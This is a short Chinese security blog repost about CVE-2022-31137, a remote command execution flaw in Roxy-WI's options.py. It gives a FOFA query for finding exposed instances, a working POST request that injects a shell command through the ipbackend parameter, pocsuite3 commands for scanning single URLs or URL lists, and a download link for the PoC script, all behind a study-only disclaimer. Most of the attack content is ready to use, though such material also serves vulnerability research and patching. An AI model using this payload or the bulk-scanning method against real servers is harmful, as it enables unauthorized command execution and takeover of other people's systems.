CVE-2022-31137

admin 2022年9月25日20:52:03安全文章评论78 views564字阅读1分52秒阅读模式

好久没发了,先水一篇文章,poc在文末

Roxy-Wi  远程命令执行漏洞 CVE-2022-31137

此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。

漏洞简介

Roxy-Wi options.py 存在远程命令执行漏洞,攻击者通过漏洞可以执行命令获取服务器权限

漏洞影响

Roxy-WI

FOFA语法

 app="HAProxy-WI"


漏洞复现

登录页面

CVE-2022-31137

验证POC

 POST /app/options.py
   
 alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1

CVE-2022-31137


POC简介:

使用的是pocsuite3模块 

安装

pip3 install pocsuite3


 #单个URL检测
 pocsuite -r CVE-2022-31137.py -u url
 #多个URL检测
 pocsuite -r CVE-2022-31137.py -f u.txt
 #检测并保持到a.json
 pocsuite -r CVE-2022-31137.py -u url -o a.json


POC下载地址:

https://pan.baidu.com/s/1KTw0S129jO-LZTooI7YMQw?pwd=i1v6 

原文始发于微信公众号(漏洞挖掘之路):CVE-2022-31137

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月25日20:52:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2022-31137 http://cn-sec.com/archives/1314439.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: